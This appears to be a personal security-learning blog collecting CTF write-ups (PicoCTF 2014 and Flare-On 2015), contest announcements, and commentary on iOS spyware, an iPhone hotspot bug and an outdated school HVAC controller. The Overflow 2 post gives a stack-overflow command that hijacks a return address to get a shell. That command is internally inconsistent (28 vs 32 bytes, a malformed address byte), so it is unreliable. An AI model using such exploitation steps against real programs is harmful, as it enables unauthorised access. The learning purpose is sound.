ICS Challenge and SANS Holiday Hack

I did what I could on the SANS ICS Challenge.  I was trying to work on two challenges at one time.  I looked forward to the SANS Holiday Hack Challenge all year.  I'm disappointed with myself though.  I wasn't able to complete either of them.  I guess that I did okay, considering that I don't have a lot of work experience or course experience with either of them.  I'll post the answers that I did get after the challenges are officially over.

I picked up a new book called "The Art of Memory Forensics".  I used it to help me solve some of the ICS Challenge.  I'm haven't read much of it, because I don't understand much of what it is talking about.  I keep Googling stuff that I don't understand.

I think that I need to get a book that goes into depth about different OS processes, and what is normal.  I can't recognize abnormal because I don't know what normal is.

I like forensics, but I imagine that working in forensics is quite different than this challenge.  I think that when one is working in forensics, they are probably using a lot of automated tools/scripts, and there really isn't a lot of spelunking.  They might have to verify results, but it's not the same.  That's not necessarily a bad thing, though.  It could be interesting, but in a different way.

On the Holiday Hack Challenge, I feel that I'm close on two of the super gnomes, but I just can't get what I'm trying to do to work.  My spouse states that sometimes it's about attitude.  A student might try one thing, and it doesn't work, then the instructor walks up, types the exact same thing, and suddenly it works.  You have to believe that it will work.  It doesn't make much sense to me.  Who would've thought that turning a computer off then on again would solve about 98% of computer problems though?

I learned stuff so quickly to begin with, and now I'm at that point where things are getting more difficult to learn as I progress in knowledge.  I just have to power through this and keep trying.

SANS ICS Challenge

SANS is starting a new Challenge soon.  Registration has already started.  The challenge officially starts on November 15th, 2015.  I'm looking forward to it because it has to do with industrial control systems, and it was inspired by the DC3 Digital Forensics Challenges.  It states on the website that it's for all levels of experience as well, so I might have a chance to learn something new.

Here's the link to the SANS ICS Challenge website:

http://icscybersecuritychallenge.com

iPhone 6 Plus "Feature"

My husband and I discovered a "feature" with the IPhone 6 Plus.  One morning, my husband was able to see my phone under his "WiFi" Connections as a device that was able to be connected to.  (Note:  Not under Bluetooth, Under WiFi.  He wasn't able to see it before that update.)  The problem:  I did not have the "Personal Hotspot" setting turned on on my phone.  I did happen to have my Bluetooth setting turned on so that I could connect to my Fit Bit Surge via Bluetooth.  It gets even worse.  Not only was he able to see my device in his connections, he was able to connect to it without even having to type in a password at all.  (It was set to the default password on the Personal Hotspot settings of the phone.)  When he connected to my phone with his phone, it changed MY "Personal Hotspot" setting to On.  Fortunately, they fixed the authentication issue, requiring him to put in a password, now, however, when I have my Bluetooth on, he can still see my phone under his WiFi connections, and when he tries to connect, it still changes MY "Personal Hotspot" Setting to On.  In the original bug report, I tested it with a device with a different Apple ID, and I was able to see and connect to my phone.  Now the different ID still detects the phone but requires a Bluetooth pairing.  This was with a MacBook Pro, though, not another phone.  I do not know what another phone with a different AppleID will do, considering that I don't own another phone.  I did think that it was prudent to mention that I submitted this "Feature" of another person being able to change my "Personal Hotspot" setting from their device as a bug, however, I was told that as long as it's the same Apple ID on both devices that it was working as intended.  Okay, so how do the devices know that they are on the same ID?  Do they broadcast that information?  Is it stored in the AppleID database under a devices section?  Secondly, what if someone happened to steal the ID and was near enough to automatically connect to my device?  It doesn't sound like a feature to me.  It sounds like a bug that needs to be resolved.  I'm keeping my Bluetooth on my device turned off.  I don't need to sync my FitBit Surge that bad.  If you really need to sync something via Bluetooth, I suggest changing that default password on your "Personal Hotspot" setting just in case, and testing it.

PicoCTF 2014 ExecuteMe & PicoCTF 2014 OBO

I'm working on these in my spare time.  I still haven't solved these.  I think that I know what I'm supposed to do, but I either have the wrong shell code, or I'm getting the syntax wrong.  For Execute Me, I think that I'm supposed to send the C program Shell Code.  That's what the hint says.  So, I tried this:  The <shell code here> part actually has shell code in it when I type the command.

./executeme $(python -c 'print "<shell code here>"')

No shell code.

$(python -c 'print "<shell code here>"') | ./executeme

That gets me a shell, but I can't interact with it without getting a segmentation fault.  So then I tried this:

$(python -c 'print "<shell code here>"') & cat flag.txt | ./executeme

I'm getting a command not found error.

So I go on to start reading OBO.  I can go back to Execute Me anytime.  Here is the interesting part of the program for OBO:

int hex_table[256];

void generate_hex_table(void) {

  int i;

  for (i = 0; i <= 256; ++i) {

    hex_table[i] = -1;

  }

  for (i = 0; i <= 10; ++i) {

    hex_table['0' + i] = i;

  }

  for (i = 0; i <= 6; ++i) {

    hex_table['a' + i] = 10 + i;

  }

  for (i = 0; i <= 6; ++i) {

    hex_table['A' + i] = 10 + i;

  }

  // I don't know why, but I was getting errors, and this fixes it.

  hex_table[0] = 0;

}

int read_password(FILE *file, char *password, size_t n) {

  fgets(password, n, file);

  password[strcspn(password, "\n")] = '\0';

I think that OBO stands for Off By One.  As in Off By One error in C programming.  I was looking at the first for loop and noticed that he started variable "i" as 0.  Then he iterates it to 256.  If "i" started at one, that would be fine, but it doesn't.  So, he iterated through the first for loop one too many times.  Then I noticed the null byte (\0) which was tacked on the phrase "password[strcspn(password, "\n")] = '\0';"  If I'm not mistaken, it overwrites the lowest memory byte.  So I was wondering what was useful about that.  I looked at Google, and found an article about a poison null byte.  I also found a SANS white paper describing how to exploit an off by one error.  I haven't tried yet, but from what I understand, one way to exploit it is, you control the address, so you can have the pointer point at a buffer, put shell code into the buffer, and you get shell.  

It's kind of scary how much difference one byte can make.

https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481

http://insecure.org/news/P55-07.txt

PicoCTF 2014 PNG Or Not?

I was given a png image and told that there was some data hidden within.  If you do a Google searches on PNG files, you will note that you can hide files in it.  I opened up the image with a hex editor.  Near the bottom of the file, I found 7z, then the words flag.txt.  I know, from reading articles, that I can carve files using headers and footers.  I knew that the header for a 7z file is 37 7A BC AF 27.  I just selected the bytes from that header to the end of the file, copied it onto another sheet in the hex editing program and saved it as a 7z file.  I opened up the flag.txt file using the archive manager, and I got the flag.  EKSi7MktjOpvwesurw0v

Update:  Easier Way:  Command line:

7z x 2pngornot2png.png

Then

cat flag.txt

PicoCTF 2014 Droid App

I was given a droid app that I needed to decompile to find debug information.  Droid apps are really easy to decompile.  The hint said that that could even be decompiled online.  I used Kali linux and a tool called dex2jar.  Dex2jar does just what it says it does.  It changes dex files into jar files.  One I had a jar file, I just used java, which was already installed on Kali to decompile a java class file.

j2dex-jar2dex classes.dex -o classes.jar

I opened the jar file using the Archive Manager.  I could see the contents of the jar file.  I navigated the directory structure mine was picoapp453-picoctf-com-picoapp, then I selected ToasterActivity.class because it looked interesting to me.  Then I used the command line to decompile the class file for me so that I could read it.

javap -c ToasterActivity.class

public void displayMessage(android.view.View);

    Code:

       0: aload_0       

       1: invokevirtual #40;                // Method getApplicationContext:()Landroid/content/Context;

       4: ldc           #42;                // String Toasters don't toast toast, toast toast toast!

       6: iconst_1      

       7: invokestatic  #48;                // Method android/widget/Toast.makeText:(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;

      10: invokevirtual #51;                // Method android/widget/Toast.show:()V

      13: ldc           #53;                // String Debug tag

      15: aload_0       

      16: getfield      #34;                // Field mystery:Ljava/lang/String;

      19: invokestatic  #59;                // Method android/util/Log.d:(Ljava/lang/String;Ljava/lang/String;)I

      22: pop           

      23: return 

Note the Debug tag comment on Code 13.  Also note the string on Code 4.  They were looking for the string, "Toasters don't toast toast, toast toast toast!"

So I found debug info.  The flag was in this class as well.  The flag was in this part.

public picoapp453.picoctf.com.picoapp.ToasterActivity();
    Code:
       0: aload_0    
       1: invokespecial #10;                // Method android/support/v7/app/ActionBarActivity."<init>":()V
       4: aload_0    
       5: new           #12;                // class java/lang/String
       8: dup        
       9: bipush        33
      11: newarray       char
      13: dup        
      14: iconst_0    
      15: ldc           #13;                // int 102
      17: castore    
      18: dup        
      19: iconst_1    
      20: ldc           #14;                // int 108
      22: castore    
      23: dup        
      24: iconst_2    
      25: ldc           #15;                // int 97
      27: castore    
      28: dup        
      29: iconst_3    
      30: ldc           #16;                // int 103
      32: castore    
      33: dup        
      34: iconst_4    
      35: ldc           #17;                // int 32
      37: castore    
      38: dup        
      39: iconst_5    
      40: ldc           #18;                // int 105
      42: castore    
      43: dup        
      44: bipush        6
      46: ldc           #19;                // int 115
      48: castore    
      49: dup        
      50: bipush        7
      52: ldc           #20;                // int 58
      54: castore    
      55: dup        
      56: bipush        8
      58: ldc           #17;                // int 32
      60: castore    
      61: dup        
      62: bipush        9
      64: ldc           #21;                // int 119
      66: castore    
      67: dup        
      68: bipush        10
      70: ldc           #22;                // int 104
      72: castore    
      73: dup        
      74: bipush        11
      76: ldc           #15;                // int 97
      78: castore    
      79: dup        
      80: bipush        12
      82: ldc           #23;                // int 116
      84: castore    
      85: dup        
      86: bipush        13
      88: ldc           #24;                // int 95
      90: castore    
      91: dup        
      92: bipush        14
      94: ldc           #25;                // int 100
      96: castore    
      97: dup        
      98: bipush        15
     100: ldc           #26;                // int 111
     102: castore    
     103: dup        
     104: bipush        16
     106: ldc           #27;                // int 101
     108: castore    
     109: dup        
     110: bipush        17
     112: ldc           #19;                // int 115
     114: castore    
     115: dup        
     116: bipush        18
     118: ldc           #24;                // int 95
     120: castore    
     121: dup        
     122: bipush        19
     124: ldc           #23;                // int 116
     126: castore    
     127: dup        
     128: bipush        20
     130: ldc           #22;                // int 104
     132: castore    
     133: dup        
     134: bipush        21
     136: ldc           #27;                // int 101
     138: castore    
     139: dup        
     140: bipush        22
     142: ldc           #24;                // int 95
     144: castore    
     145: dup        
     146: bipush        23
     148: ldc           #14;                // int 108
     150: castore    
     151: dup        
     152: bipush        24
     154: ldc           #26;                // int 111
     156: castore    
     157: dup        
     158: bipush        25
     160: ldc           #16;                // int 103
     162: castore    
     163: dup        
     164: bipush        26
     166: ldc           #28;                // int 99
     168: castore    
     169: dup        
     170: bipush        27
     172: ldc           #15;                // int 97
     174: castore    
     175: dup        
     176: bipush        28
     178: ldc           #23;                // int 116
     180: castore    
     181: dup        
     182: bipush        29
     184: ldc           #24;                // int 95
     186: castore    
     187: dup        
     188: bipush        30
     190: ldc           #19;                // int 115
     192: castore    
     193: dup        
     194: bipush        31
     196: ldc           #15;                // int 97
     198: castore    
     199: dup        
     200: bipush        32
     202: ldc           #29;                // int 121
     204: castore    
     205: invokespecial #32;                // Method java/lang/String."<init>":([C)V
     208: putfield      #34;                // Field mystery:Ljava/lang/String;
     211: return      

I had to change each of those decimals in the comments (the ones after the //) into ascii characters.  The flag was:  what_does_log_cat_say 

PicoCTF 2014 Cyborg Secrets

This one was extremely easy.  I had to find a password for a password-protected binary relating to a cyborg’s defense mechanisms in the game.  I had to find the shut down code for the cyborg.  I just open the executable in a hex editor, and search for a password.  There was a debug password, and a to do note stating that they need to remove the debug password.  LOL  The debug password was: 2manyHacks_Debug_Admin_Test.  And the shut down code was: 403-shutdown-for-what.

PicoCTF 2014 Overflow 2

I actually had this one, and a few other solved a while ago.  My VM that they were stored got corrupted, so I lost all those files.  Good thing that it was a VM and not my host machine that got corrupted.  This is how I solved Overflow2.

This is a C program that is vulnerable to a buffer overflow vulnerability because of the strcpy function.  In order to exploit this vulnerability, I have to change control of the execution of the program to myself by overwriting the return address so that it sends the function pointer to the address of the give_shell function instead of the next address on the stack.  In the command prompt, I found the address by typing objdump -d overflow2 | grep “shell”.  The -d option of objdump disassembles the program and gives me a list of functions.  I only want one function, though, the give_shell function, so I pipe objdump in to another command called grep which searches for the “shell” string, and only displays the functions with the word “shell” in them.  The address of the give_shell function is: 080484ad.  The buffer is 16 characters long.  The instruction point is 4 bytes long.  The base pointer is 4 bytes long.  The return address is 4 bytes long.  So, to figure out how many bytes I need to overwrite, I add the amount of bytes for the instruction pointer, the amount of bytes for the base pointer, the amount of bytes for the buffer, and the amount of bytes for the return address that I want to overwrite.  So, it’s 16 + 4 + 4 + 4 = 28.  Then I add the address that I want the return address pointer to point to.  I’m using python, because I want to be able to tell it to print hex characters for me for the address.  So the command is now, ./overflow2 $(python ‘print “A”*32 + “\xad\x04\x84\08”’)  I have to type the address backwards because the server understand things in Little Endian format.  Once I type this into the command prompt, I get a shell prompt.  Then I type, cat flag.txt, and get the flag, controlling_%eip_feels_great.

EasyCTF

Looking at this one for my 11 year old.  It's a high school competition.  The home page states that it is October 31st - November 7th, 2015.  It's strange because the e-mail that I got about it states that it's October 3rd - 10th.  Maybe people who are interested should e-mail the creators to find out?  The website is https://www.easyctf.com.  The website has nice external resources under the "Learn" part of the menu.

I'm trying to teach my son to be ethical about hacking, meaning that he should obey the laws and have permission before doing any kind of pen-testing.  I think that these ctfs are a good way to have fun, and learn, while being honest and ethical at the same time.

I looked at the sample problems under the "About" part of the menu and solved them for fun.  I showed my son the solutions.  (If he tries this ctf, I will not help him beyond giving him search parameters for Google.)

The first sample was an easy substitution cipher.  I've seen plenty of these, so I recognized it immediately.  I think that pretty much anyone over the age of 5 can see these for what they are.

The second sample problem was a reversing problem.

x = raw_input("enter the password: ");
y = "";
for c in x:
    y += chr(ord(c) ^ 14);
    if y == "ko}wmzhugQocQoQhbois":
        print "congratz the flag is " + y;
    else:
        print "nope";

They were asking for the flag.  If I read the program properly, the flag is the contents of the variable x.  In the program it says, print "congratz the flag is" and the variable y.  The contents of variable y was ko}wmzhugQocQoQhbois.  You get that by Bitwise XORing each character of x with the decimal number 14.  I was curious about what password one would have to enter to get that flag placed into variable y, so I wrote a small python program to see.

Then I ran the program in a command prompt:  python reverse.py

I thought that the sample problems actually advertising the challenge were kind of cute.  If you are new to cyber security and want to learn about it, I suggest you give this challenge a try.  Only middle school and high school students will be eligible for any rewards, though.

SANS CyberTalent Immersion Academy for Women

Hi.  I've been busy doing the SANS Cyber Defense Challenge.  I ended up in 6th place overall.  Not bad for a stay-at-home mom.  I just recently got hired for a temporary position with a possibility of getting hired on full-time if I do a decent job.  But enough about my life. 

I know about an exciting opportunity for women in IT.  SANS is offering free SANS training to qualifying participants.  It's called the SANS CyberTalent Immersion Academy for Women.  If you are a college junior, senior, or are a recently graduated woman, I encourage you to apply.  It's completely free for anyone that is accepted so long as they agree to work for two years for a company sponsoring them.  Accepted applicants also get the certification attempts that go along with the training.  For more information about this program, visit:  https://www.sans.org/cybertalent/immersion-academy/programs#womens-academy

SANS Pen Testing Twitter Contest

I didn't finish the flare-on challenge.  I'm reading the write-ups.  I actually feel like I learn quite a bit from reading the write-ups, and other people's solutions.  There is usually more than one method to solve a problem, and some methods are more efficient than others.

I'm in the midst of the SANS Cyber Defense Challenge.  I'm currently in 3rd place.  That may change soon because there are some really competitive and brilliant people in this challenge.  I was happy to be in the top fifty.  I never in my wildest dreams thought that I would be this close.  The first and second place winners have a chance to go to San Diego for a couple of days for a chance to be named Ultimate Cyber Defender 2015.

The SANS Pen Testing blog just released a new contest today.  It's a simple Twitter contest.  All you have to do is take a photo of yourself wearing a NetWars shirt, OR with a coin or SANS sticker, OR with any item associated with SANS, OR with a SANS book, OR with the pen-testing blog website in your browser window and tweet it to @SANSPenTest with the hashtag #SANSHackFest.  There is a chance to win free two day admission to HackFest on Nov 16th and 17th.  You can enter as much as you like between 9-25-2015 and 10-02-2015.  You can check that out at: https://pen-testing.sans.org/blog/pen-testing/2015/09/25/2015-sans-pen-test-hackfest-twitter-contest

Flare-On Challenge Part One Solution

Update:  I mistakenly thought that the challenge answers were due today.  It's actually not due until the 8th, which is next week.  Fortunately, I don't think that this answer will affect the outcome.  I will be more careful about posting solutions in the future.  I apologize to the creators of the Flare-On Challenge.  I will continue to work on the challenge then.  :)

The Flare-On Challenge 2015 is a challenge created by Fire Eye about digital forensics and reverse engineering.  In order to complete the challenge, one must find a series of e-mail addresses and send a message to those addresses to get each part of the challenge.  They warned that there is live malware in this challenge.  I used a SIFT VM and IDA Pro (Free version) for this part of the challenge.  IDA Pro (Free version) ran just fine on WINE.

I did not complete this challenge.  I solved one question, which is more than I expected to solve because I have hardly any prior experience in reverse engineering.  The only reverse engineering that I have done is for previous challenges.  I hope that they release the rest of the files in this challenge, because I tend to learn better by doing something, than seeing or hearing about it.

For the first Flare-On Challenge of 2015, I was given a program, i_am_happy_you_are_to_playing_the_flareon_challenge.exe that simply asked me to find a password.

I looked at the previous flare-on challenge answers to see if there was a similar problem to this one.  There was.  It was Challenge 3:Shellolololol.  I learned that data starting at address 0x401000 can be interesting because according to the solutions from last year at www.fireeye.com/blog/threat-research/2014/11/the_flare_on_challen.html, "it is the beginning of the code section, which commonly is where the beginning of any user-written code exists."

I began looking at that section of code.  I'm not familiar with assembly, but after looking at the code for a little bit, and using Google to understand what each instruction did, I saw:

text:0040104D loc_40104D:                             ; CODE XREF: start+61 j
.text:0040104D                 mov     al, byte_402158[ecx]
.text:00401053                 xor     al, 7Dh
.text:00401055                 cmp     al, byte_402140[ecx]
.text:0040105B                 jnz     short loc_40107B
.text:0040105D                 inc     ecx
.text:0040105E                 cmp     ecx, 18h
.text:00401061                 jl      short loc_40104D

I have studied a little C and Java, so I thought that when the program read in a person's response to "Enter the password", that it needed to put that information in a buffer.  The buffer is at address 0x402158.  I confirmed that statement by using the jump/jump to address functionality of IDA to jump to address 0x402158 and noted that all of the items in that buffer are set to 0.  I didn't run the program and put anything in there, so there aren't any characters to put in those slots.  The machine has to reserve a place in memory for them though, so it starts the items in the buffer at 0x402158 at 0.  It's called initialization.  Initialization of variables, or a buffer in this case, is recommended in most of the programming languages that I have studied.

I noted from the cmp statement that the password was probably started at the address of 0x402140.  Cmp in assembly, in this case, means to compare the value in al with the byte stored at 0x402140.  When you use cmp in assembly, it affects two flags, the zero flag(zf) and the carry flag(cf).  If the byte in the 0x402158 address matches the byte in the 0x402140 address, then it sets the zf flag to 0. Otherwise, it sets the zf flag to 1.  In this program's case, it jumps to the "You are a failure" part of the program if the zf is not equal to zero.

If you look later in the code above, it has a jl statement.  What that means is that the program is telling the machine to jump to location 0x40104D if ecx is less than 18h.  That means that the program is using a loop.  The program increments the value at ecx by 1.  ECX starts at 0.  ECX is incrementing the address where the bytes of the password are being stored.  To break out of the loop, the assembly says to compare ecx with 18h.  The last password byte is at byte 0x402157.  So it says that if ecx has incremented 18 hexidecimal, which it would if it started at 0x402140 and ended at 0x402158, then you need to break out of this loop, so it doesn't follow the next jump instruction once ecx is = 18h.

What the program is doing is xoring each byte in the buffer with the hex character 7D, then comparing each byte in the buffer with each byte of the password.  I used the jump/jump to address function of IDA to jump to 0x402140 to confirm my analysis.  I noticed a strange line of characters.

1F
8
13h
13h
4
22h
0Eh
11h
4Dh
0Dh
18h
3Dh
1Bh
11h
1Ch
0Fh
18h
50h
12h
13h
53h
1Eh
12h
10h

The similar example from last year showed exactly what to do. All I had to do to reverse engineer this password obfuscation was xor each byte of the password at address 0x402140 with the hex character 7Dh, and I had my answer.  I could just take each byte and manually xor each byte, and then convert those values from hex to ascii using one of the many tools online, but there is a faster way.  It's called scripting.  I purchased a book called The IDA Pro Book:  The Unofficial Guide to IDA Pro by Chris Eagle, which I highly recommend.  It addressed scripting for IDA in it.  Even though the name says, "Pro", it covers the difference between the IDA Pro and Free versions, and how one could effectively use the free version.  It also shows excellent examples of assembly language, for those, like me, who don't have a lot of experience with assembly.  I'm currently about halfway through the book, but plan on finishing it as soon as I can.  (I am not getting paid to tell you about this book.)

The actual script that I used below, I found by using Google.  It was at www.stackoverflow.com/questions/13495538/ida-pro-string-function  Thanks user1354557 for having the insight to realize that not everyone has IDA Pro.  Here is the script that I modified to fit my needs:

Version on Stack Exchange:
auto addr;
auto b;
addr = 0x00401000;
while(1){
b = Byte(addr) ^ 0x1F;
PatchByte(addr, b);
if (b == '\0'){
break;
}
addr = addr + 1;
}

I didn't need to start at that address, so I changed the starting address.  I was xoring with the 7Dh byte, not 1Fh.  I didn't care for the depending on a nul terminator to break out of the loop.  I preferred stopping at the last address in the password byte addresses because there may be other code that would be overwritten if there is not a nul terminator to break out of the loop.  So here is my modified version:

Modified version:
auto addr;
auto b;
addr = 0x402140;
while(1){
b = Byte(addr) ^ 0x7D;
PatchByte(addr, b);
if (addr == 0x402157){
break;
}
addr = addr + 1;
}

The byte at 402140 didn't automatically show a comment with a "b".  There was already a cross reference comment in that spot, so maybe that had something to do with it?  However, the script properly changed the value. So, all I had to do was to convert that one hex value into an ascii character, and add my own comment.  Update:  Used the right click command "undefine" at the address 0x402140, and it showed the "; b" comment.  I guess that IDA thought that that character was something else, not a character.  Right-clicking on it again gives the option of converting all the characters to a string.

62h ; b
75h ; u
6Eh ; n
6Eh ; n
79h ; y
5Fh ; _
73h ; s
6Ch ; l
30h ; 0
70h ; p
65h ; e
40h ; @
66h ; f
6Ch ; l
61h ; a
72h ; r
65h ; e
2Dh ; -
6Fh ; o
6Eh ; n
2Eh ; .
63h ; c
6Fh ; o
6Dh ; m

The password is:
bunny_sl0pe@flare-on.com

I sent a message to that e-mail and got the next challenge.

Flare-On Challenge and SANS Cyber Defense Challenge

I'm currently trying to work on a couple of challenges.  I can't say much about the Flare-On Challenge.  I just found out about it Monday evening.  It is only ongoing until September 1st.  I don't really have a lot of experience with digital forensics, but I decided I would give it a try.  I will be happy if I solve one puzzle.  If interested, you may want to check out, http://www.flare-on.com.  Be careful, though, because it is noted on the site that some parts of the challenge may be malicious.  The reason being is because when doing digital forensics, one has to analyze malware.  I use VM's on a computer that I do not use for any activity other than challenges.  That way, even if malware breaks out of the VM, which some advanced ones can, I can just start from scratch.

The SANS Cyber Defense Challenge seems more straightforward so far.  You just answer a series of questions that you receive via e-mail.  There are ways to get more points as well, like being socially active about SANS Cyber Defense, and sharing good information regarding the field.  It'll probably get more difficult as it goes on.  I don't have a lot of experience in that either.  So, even if I don't win, I'll consider it a decent learning experience.  That challenge can be found at http://cyber-defense.sans.org/blog/2015/06/11/cyber-defense-challenge-leaderboard-2015.

I found a good Intro to Assembly tutorial at http://chortle.ccsu.edu/AssemblyTutorial/index.html.  I'm staring at a lot of assembly code trying the Flare-On Challenge, and I have no idea how to make heads or tails of it as of yet.  I downloaded IDA Free version, CFF Explorer, PE Explorer, Ollydbg, and ILSpy.  I installed them on a VM.  So far they seem fairly easy to use.  All of them except for ILSpy work okay using Wine.  ILSpy requires Microsoft .NET Framework 4.0.  I'm not sure if that will run on Wine or not.  I'll have to do more research on that, or start up a Windows VM and put it on there.  For the IDA Free version, I found some scripts that add functionality to it.  I was reading articles on resources.infosecinstitute.com called, "Applied Cracking & Byte Patching with IDA Pro" and "Applied Reverse Engineering with IDA Pro" that explained a little bit about how to use those scripts.  I want to find some more in-depth information about those scripts.  So I'll be looking more into that as well.

Hacking Team iOS Malware

I've seen quite a few tweets about the Hacking Team iOS malware.  Specifically, I was reading this blog, today.  https://blog.lookout.com/blog/2015/07/10/hacking-team/

It's interesting, because months ago, I was wondering if iPhones could be targeted from apps/programs installed on the computer, and vice versa.  One could create malware that infects one via the other.  The reason that I thought this was because I was reading an article about USB devices being trusted, completely, by a computer.  If you really get down to it, isn't that what a mobile device is?  A storage device with a little more capability? 

The blog states this:

"It appears there are three ways Hacking Team could get its spyware onto iOS devices:

An OS X app sideloads an iOS app automatically to a device when it’s plugged in via USB. This also appears to be bundled with a jailbreak exploit that may work on older versions of iOS.

There is a Windows desktop app that appears to do the same.

By clicking on a link to download from a website, email, etc. on the mobile device"

Phones, and other mobile devices are an excellent avenue of attack.  How many of us are running some sort of security suite on our mobile devices?  Hardly anyone. What kind of things do many of us do on our mobile devices?  Banking, Buying things, checking our healthcare status, etc.

Fortunately, according to the blog, this attack appears to require physical access.  However, they also state:

"With this specific attack, we believe physical access to the device was required, but Hacking Team’s possession of an enterprise certificate means that there’s the potential for other flavors of this attack that could be delivered via a web browser (drive by download), phishing email or other remote means."

The blog also states that iOS devices prevent the password from being typed in, but in many cases passwords aren't that difficult to figure out once one has the user name.  Since it can grab e-mails.  Sometimes, the passwords are in the password reset notifications.

"It’s important to note that Apple does have some safeguards built into its third party keyboard support, which does not allow the keyboard to run in a field that is marked as a password field, so this tool won’t be able to steal passwords from properly implemented apps and websites, but it can be used to steal usernames, contents of emails, and other sensitive data."

I fear that if it hasn't been done already that malware creators will find a way to make these exploits persistent.  What I mean by persistence is making sure that once it's on the phone, it stays there, regardless of user intervention.  I'm not well-versed in how these work, but couldn't one simply uninstall the malware from the devices in this particular case?  I guess that if they have the app/program on the computer that it could just re-install itself.  Users could get rid of the app/or program on the computer, though, and then it shouldn't be a problem.

The blog has decent advice about mobile security best practices.

"And, here are some general tips for staying safe:

Keep a passcode on your phone. A lot of spyware sold on the market requires that the attacker have physical access to the target device to install the software. Putting a passcode on your phone makes it that much harder for them.

Don’t download apps from third party marketplaces or links online. Spyware is also distributed through these means. Only download from official and vetted marketplaces such as the Apple App Store and Google Play. 

Don’t jailbreak your device unless you really know what you’re doing. Because jailbroken iOS devices are inherently less protected, they are more vulnerable to attack when security protection measures aren’t properly enabled.

Download a security app that can stop attacks before they do harm. Lookout does this, but if you’re not a Lookout user, ask your security provider if they detect Hacking Team and other forms of spyware."

I would also like to note that if you are using a device with a fingerprint reader on your phone, that you should make a long pin, and use the fingerprint reader for ease of logging in.  The smudges on the phone make it easy to see what the numbers are, and people can see you entering the pin.  If you're using a 4 digit pin, those pins are fairly trivial to guess if you know the numbers that they are using.

Insecure Control Systems

My spouse sent me an article today:  http://www.dailydot.com/technology/commadore-amiga-computer-school-air-conditioning/.  I read the article, and it scares me.  The article states that an old Commodore Amiga machine controls the heat and air conditioning of the district's schools.  This is one of the most fearsome sections in the article:

"It's one of those features, the 1200-bit modem and a wireless radio signal, that makes it possible for the ancient hardware to communicate with the district's schools.  Though the radio signal allows the Amiga to get status checks, toggle boilers, fans, and the like in a matter of seconds, it also communicates at the same frequency as the walkie-talkies used by the maintenance department. This creates occasional interference and requires the maintenance crew to shut off their radios for up to 15 minutes at a time."

I noted that the old machine needs to be replaced.  Some people would say, "Why get rid of something that works?" 

Here is why:  My spouse and I were conversing, and he mentioned that the Amiga is transmitting a wireless frequency.  Since this machine was made in the 80's, the wireless signal may not be encrypted.  Anyone with a wireless sniffer, like aircrack-ng, could sniff this traffic, and potentially inject commands, which means that they could control the heat and air-conditioning.  When they have control over the heat and air-conditioning, they could cause the boilers in the schools to explode by changing the settings.

People wonder why someone would target a school.  There's a few reasons that I can think of.  I'm sure that there are more.  One)  A disgruntled employee with technical knowledge wants to get revenge because they are not getting the pay that they would like, or they've been fired.  Two)  A disgruntled student isn't happy with being in school for some reason-bullying, no one is dating them, they're mentally unstable, etc.   Three) A terrorist who can have one of many reasons to do such a thing.

There was money set aside to pay for replacing the machine.  The school opted to take care of other projects instead.  I can't say that I blame them with the information that they have, replacing the boilers and roofs, and removing asbestos was important at the time.

"It was expected the outdated system would be replaced in 2011 when voters passed a "Warm Safe and Dry" bond to release money to the district schools for upkeep and maintenance purposes. Because the computer was still functioning just fine, it didn't make the list of projects. Instead, the money was spent replacing boilers and roofs and removing asbestos."

So, it wasn't a matter of not having enough money in the budget, this just wasn't a priority.  There needs to be more awareness raised about the dangers of unsecured control systems.  Even if they don't think that they are a target, they could be.

At least they mention planning on replacing it now... if a 175 million bond for school spending is passed.

"A new system will cost up to $2 million, and will be installed if voters pass a $175 million bond for school spending."

Last, if this school has an ancient machine running their control systems, it makes me worry about what other control systems are being controlled by ancient machines and how secure they are.

Picoctf 2014 Snapcat :)

Snapcat

We were given a corrupted disk image.  We were supposed to get information off of it.  I looked at the disk image using a hex editor, and noticed that it had pictures on it.  I saw jpeg headers.  So, I used a program called Foremost on my SIFT VM to carve the images out of the disk.img file.

$ foremost -t jpg –o ~/Desktop –c etc/foremost.conf disk.img

-t: specifies what type of file that I want to be carved out.
-o: specifies the directory where I want the output file
-c: specifies where the foremost config file is
disk.img is the name of the img that I was carving files out of.

One of the pictures that was output had this flag.

i_can_has_cheezburger

Being Ethical

I post about pen-testing and digital forensics challenges that I do.  I think that that can give the wrong impression of the kind of person that I am. 

I don't like "hacking" in the derogatory sense.  It is morally wrong when you harm other people or cause their machines to malfunction.  Someone stole my identity when I was younger, and I remember all of the hoops that I had to jump through to put my life back together.  I don't wish that kind of harm on another person.

It's also unethical.  I analyze risk.  If someone is caught doing something wrong, it makes them untrustworthy.  That means that they could be blacklisted from getting hired anywhere.  I don't think that hacking someone without permission is worth that risk. 

I like doing the challenges because they are like puzzles to be solved.  Nothing more than that.  I've always liked solving puzzles.  Right now, it's a hobby that I enjoy. 

Some day, I hope to get into the field.  I'm not sure exactly which area yet.  There are many areas in the field of computer security.  Right now, I'm just learning a little bit of everything that I can.  Pen-testing and defense, for instance, are two sides of the same coin, according to Ed Skoudis.  How can you defend a network if you don't know the avenues that are available to exploit it?  So, even though I'm learning some pen-testing, it could be relevant to defense and vice versa.

What Did I Learn From My First Live Cyber Challenge

I’m writing this post in hopes that it helps people who are afraid to try these cyber challenges because they think that they don’t know enough.

I got into this challenge, not necessarily because of my knowledge, but because of my ability to find answers when I need them.  I could read a little code, I could understand a little bit about what was going on, but I can’t write code very well anymore.  It’s been 9 years since I graduated college.  As anyone knows, in tech time, that’s a long time.  There are version changes and new languages being made.  Sure, the basic things that I had learned still apply, but it’s not exactly the same.  I’ve been out of the workforce for nearly that long as well.  So if you’re in that same boat, don’t let it discourage you.

You’d be surprised how much of a distance in learning I’ve made since I started doing these online cyber challenges and this live challenge just by giving them a shot.  My first attempts weren’t very elegant.  So just try them, you might surprise yourself.

Once you make it to a camp:

Listen to the instructors.  This seems obvious, but sometimes we get distracted by minor glitches, like having connectivity issues, or taking notes, so we don’t pay attention to their message. 

Take advice from other students and the TA’s.  Another student who was more experienced than I told me to not worry so much and to open notepad or bring a notebook, and make notes of page numbers of important info as we go along.  He’s absolutely correct.  Indexing is a great idea.

